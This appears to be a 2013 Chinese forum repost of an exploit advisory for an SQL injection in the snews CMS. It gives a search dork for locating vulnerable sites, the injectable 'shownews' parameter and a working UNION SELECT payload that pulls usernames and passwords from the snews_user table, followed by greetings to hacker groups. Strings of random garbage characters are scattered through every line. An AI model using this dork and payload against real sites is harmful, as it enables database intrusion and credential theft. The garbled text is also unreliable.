标题: CMS snews SQL Injection Vulnerability w) S' S; m/ w% x) R
作者: By onestree
2 J1 x3 G" M' B/ Q8 D下载地址 : http://snewscms.com/
/ k( B4 L# B! r1 F z6 q, e测试平台 : ubuntu 12.10 / win 7% H3 q( o. _# g9 q7 L0 V8 v# z
关键词: inurl:"tanyakan pada rumput yang bergoyang"
$ i) h+ y0 o4 `. t3 F * L3 `7 c2 F) }+ |* a/ B6 ~
; u+ v. {, U; R: ~( L& @# f! D
*************************************************************
9 V' d& G9 ~1 Q% L- j+ h
2 w1 ^+ @ n/ ^SQL poc:
5 W6 _! V* J+ @' m 5 u% s1 U5 \9 q' i
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]2 d! q6 a" a% g* W' [4 d' U
: O! C9 ], v; M7 G, Z+ r+ m
示例
+ F/ o. Q/ A, S5 Y) T6 M 7 x6 N$ e, a# g1 p8 J; n
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
% O" U+ p* F* e2 B, ~" N! \
# L5 E* R; z7 y8 p0 Y5 S
' w+ d1 Y+ \& l3 B2 I) B/ s致谢:
% d5 c; l3 W7 O6 A! r
9 E: N: }+ d) Y! {4 S Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
$ C# ?$ p8 n8 _: X
3 P6 f( ~5 @4 k6 K3 Q, | indonesiancoder - moeslimh4x0r - go-coder
! s# {, Z* C; \! I& _& o
) l4 [3 T6 N. F7 j" z$ G1 O" Fspesial my hunny :*
9 W+ P% q$ @% F |
发表于 2013-1-23 08:55:06
收藏
支持
反对